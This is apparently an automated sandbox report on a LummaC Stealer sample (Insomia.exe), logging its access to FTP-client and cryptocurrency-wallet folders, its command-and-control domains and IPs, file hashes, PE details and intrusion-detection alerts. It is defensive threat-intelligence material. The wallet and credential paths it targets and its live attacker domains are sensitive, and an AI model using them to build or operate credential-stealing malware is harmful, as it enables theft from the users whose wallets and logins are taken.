Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\CZQKSDDMWR	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\LFOPODGVOH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Directory queried: C:\Users\user\Documents\SQSJKEBWDT	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: MSBuild.exe PID: 7100, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Windows Management Instrumentation	1 Scheduled Task/Job	211 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	311 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	1 Scheduled Task/Job	1 Disable or Modify Tools	LSASS Memory	22 Virtualization/Sandbox Evasion	Remote Desktop Protocol	11 Archive Collected Data	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	1 DLL Side-Loading	211 Process Injection	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	113 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	3 Clipboard Data	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	4 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	22 Software Packing	Cached Domain Credentials	22 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Insomia.exe	18%	ReversingLabs
Insomia.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://impossiblekdo.click/api	0%	Avira URL Cloud	safe
https://www.mitec.cz0	0%	Avira URL Cloud	safe
https://impossiblekdo.click/	0%	Avira URL Cloud	safe
impossiblekdo.click	0%	Avira URL Cloud	safe
https://impossiblekdo.click/apiq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
impossiblekdo.click	188.114.97.3	true	true	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	84.201.210.35	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
rabidcowse.shop	false		high
wholersorie.shop	false		high
cloudewahsj.shop	false		high
noisycuttej.shop	false		high
impossiblekdo.click	true	Avira URL Cloud: safe	unknown
nearycrepso.shop	false		high
https://impossiblekdo.click/api	true	Avira URL Cloud: safe	unknown
framekgirus.shop	false		high
tirepublicerj.shop	false		high
abruptyopsn.shop	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://impossiblekdo.click/apiq	MSBuild.exe, 00000002.00000002.3270062584.000000000105C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://sectigo.com/CPS0	Insomia.exe	false		high
https://stackoverflow.com/q/14436606/23354	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp, Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0	Insomia.exe	false		high
http://ocsp.sectigo.com0	Insomia.exe	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#	Insomia.exe	false		high
https://github.com/mgravell/protobuf-net	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#	Insomia.exe	false		high
https://www.mitec.cz0	Insomia.exe	false	Avira URL Cloud: safe	unknown
https://impossiblekdo.click/	MSBuild.exe, 00000002.00000002.3270599450.0000000001107000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-neti	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	false		high
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y	Insomia.exe	false		high
https://stackoverflow.com/q/11564914/23354;	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Insomia.exe, 00000000.00000002.2127928110.0000000004780000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2127928110.0000000004843000.00000004.00000800.00020000.00000000.sdmp, Insomia.exe, 00000000.00000002.2131761668.0000000006150000.00000004.08000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Insomia.exe, 00000000.00000002.2121237108.0000000003411000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	impossiblekdo.click	European Union		13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1584538
Start date and time:	2025-01-05 19:37:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 42s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Insomia.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/0@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 92% Number of executed functions: 328 Number of non-executed functions: 42
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 84.201.210.35, 192.229.221.95, 13.95.31.18, 20.3.187.198, 13.107.246.45
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, azureedge-t-prod.trafficmanager.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Insomia.exe

Simulations

Behavior and APIs

Time	Type	Description
13:38:08	API Interceptor	8x Sleep call for process: MSBuild.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	Gg6wivFINd.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	unasnetds.ru/eternalPython_RequestUpdateprocessAuthSqlTrafficTemporary.php
	Payment Receipt.exe	Get hash	malicious	FormBook	Browse	www.cifasnc.info/8rr3/
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	/api/get/free
	RFQ 3100185 MAHAD.exe	Get hash	malicious	FormBook	Browse	www.rgenerousrs.store/o362/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.beylikduzu616161.xyz/2nga/
	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	setup64v6.4.5.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	3LcZO15oTC.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	13.107.246.45
	4XYAW8PbZH.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	GpuXmm386e.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	yKkpG6xM4S.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	IlPF8gbvGl.msi	Get hash	malicious	Unknown	Browse	13.107.246.45
	iGhDjzEiDU.exe	Get hash	malicious	Remcos	Browse	13.107.246.45
	random.exe	Get hash	malicious	Unknown	Browse	13.107.246.45
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	T1#U5b89#U88c5#U53052.0.6.msi	Get hash	malicious	Unknown	Browse	84.201.210.34
	dGhlYXB0Z3JvdXA=-free.exe	Get hash	malicious	Unknown	Browse	84.201.210.22
	Dd5DwDCHJD.exe	Get hash	malicious	Quasar	Browse	217.20.57.35
	46VHQmFDxC.exe	Get hash	malicious	RedLine	Browse	217.20.57.43
	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	217.20.57.35
	PersonnelPolicies.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	217.20.57.37
	EiO4tqZ3o4.exe	Get hash	malicious	AsyncRAT	Browse	217.20.58.100
	wce.exe	Get hash	malicious	Unknown	Browse	217.20.58.98
	nXNMsYXFFc.exe	Get hash	malicious	Unknown	Browse	217.20.58.100
	5RaYXoKFn9.exe	Get hash	malicious	PureCrypter, PureLog Stealer	Browse	217.20.58.98
fp2e7a.wpc.phicdn.net	Tax_Refund_Claim_2024_Australian_Taxation_Office.js	Get hash	malicious	Remcos	Browse	192.229.221.95
	3lhrJ4X.exe	Get hash	malicious	LiteHTTP Bot	Browse	192.229.221.95
	Your File Is Ready To Download.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://www.klim.com	Get hash	malicious	Unknown	Browse	192.229.221.95
	Reparto Trabajo TP4.xlsm	Get hash	malicious	Unknown	Browse	192.229.221.95
	EwpsQzeky5.msi	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://gldkzr-lpqw.buzz/script/ut.js?cb%5C=1735764124690	Get hash	malicious	Unknown	Browse	192.229.221.95
	hcxmivKYfL.exe	Get hash	malicious	RedLine	Browse	192.229.221.95
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	192.229.221.95
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	LinxOptimizer.exe	Get hash	malicious	Unknown	Browse	172.67.75.163
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.208.58
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.96.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	172.67.178.174
	setup.exe	Get hash	malicious	LummaC	Browse	172.67.163.221
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.96.3

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	Aura.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	loader.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Script.exe	Get hash	malicious	LummaC, PureLog Stealer	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	188.114.97.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	'Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Set-up.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.9722352504973255
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Insomia.exe
File size:	2'786'168 bytes
MD5:	7f3bcf6644fd8551a83cc1f4bf126c4f
SHA1:	3c6a6763d27860dae7087b92dbf02a07d1bdfb6c
SHA256:	e8cbb5212a46cf5f4962e91e955b71891ffbb3477bef67d92c0949e03c4cb40b
SHA512:	6d03379514771cdadb2376f147589721e7e71b15e20c8072f6435f7a5f000deafab11748ba16c6250093659a2c1dd7e22210efa5f95e881f94562a92a79be328
SSDEEP:	49152:wtBvGG3ZFBXst5p3ma6RmT7IEkUmuKLueq2nk13RfD+UiLH:wt1GUBQ5NmLK7IvUP5L11BLgH
TLSH:	EFD5231E62A62E10D2795D3CE8E10B24027DAEA54775CBD35883F2491E333AD8758EF7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....zg................................. ........@.. ..............................6.*...`................................

File Icon


Icon Hash:	624052407ad9d733

Static PE Info

General

Entrypoint:	0x54e60e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x677AB5A5 [Sun Jan 5 16:39:01 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	21/02/2022 01:00:00 21/02/2025 00:59:59
Subject Chain	CN=ing. Michal Mutl, O=ing. Michal Mutl, S="Praha, Hlavn\xed m\u011bsto", C=CZ
Version:	3
Thumbprint MD5:	25F54ABF16EC79C193F385341BDFA0B3
Thumbprint SHA-1:	ACEEBDADAF8E139C5B5B62A835440BED74747EDF
Thumbprint SHA-256:	F2443BF7493DFEC3958C203997FFFE350CA80A7BD52BC39DA9BEB941D5DE3DF5
Serial:	7FB2DC3C0F1D43E1D1FE625E055C1480

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14e5bc	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x150000	0xaff0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x2a5620	0x2d58
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x15c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x14c614	0x14c800	5b801d579a5c4c9b0d474617b964f1a1	False	0.9619353559680451	data	7.9637366137396635	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x150000	0xaff0	0xb000	2651ba241bfc7a38d6205fd7572f9735	False	0.1005859375	data	2.9701058631913737	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x15c000	0xc	0x200	e5b70fd6211d6de983721dff4228c1cb	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x150264	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 0			0.05414501653282948
RT_ICON	0x15448c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0			0.07914937759336099
RT_ICON	0x156a34	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 0			0.10118343195266272
RT_ICON	0x15849c	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0			0.1125703564727955
RT_ICON	0x159544	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0			0.15655737704918032
RT_ICON	0x159ecc	0x6b8	Device independent bitmap graphic, 20 x 40 x 32, image size 0			0.20406976744186048
RT_ICON	0x15a584	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0			0.2730496453900709
RT_GROUP_ICON	0x15a9ec	0x68	data			0.7692307692307693
RT_VERSION	0x15aa54	0x3b0	data	English	United States	0.4597457627118644
RT_MANIFEST	0x15ae04	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-05T19:38:08.595192+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49707	188.114.97.3	443	TCP
2025-01-05T19:38:09.073077+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49707	188.114.97.3	443	TCP
2025-01-05T19:38:09.073077+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49707	188.114.97.3	443	TCP
2025-01-05T19:38:09.550373+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49708	188.114.97.3	443	TCP
2025-01-05T19:38:10.036343+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	49708	188.114.97.3	443	TCP
2025-01-05T19:38:10.036343+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	188.114.97.3	443	TCP
2025-01-05T19:38:10.858773+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49709	188.114.97.3	443	TCP
2025-01-05T19:38:11.920830+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49710	188.114.97.3	443	TCP
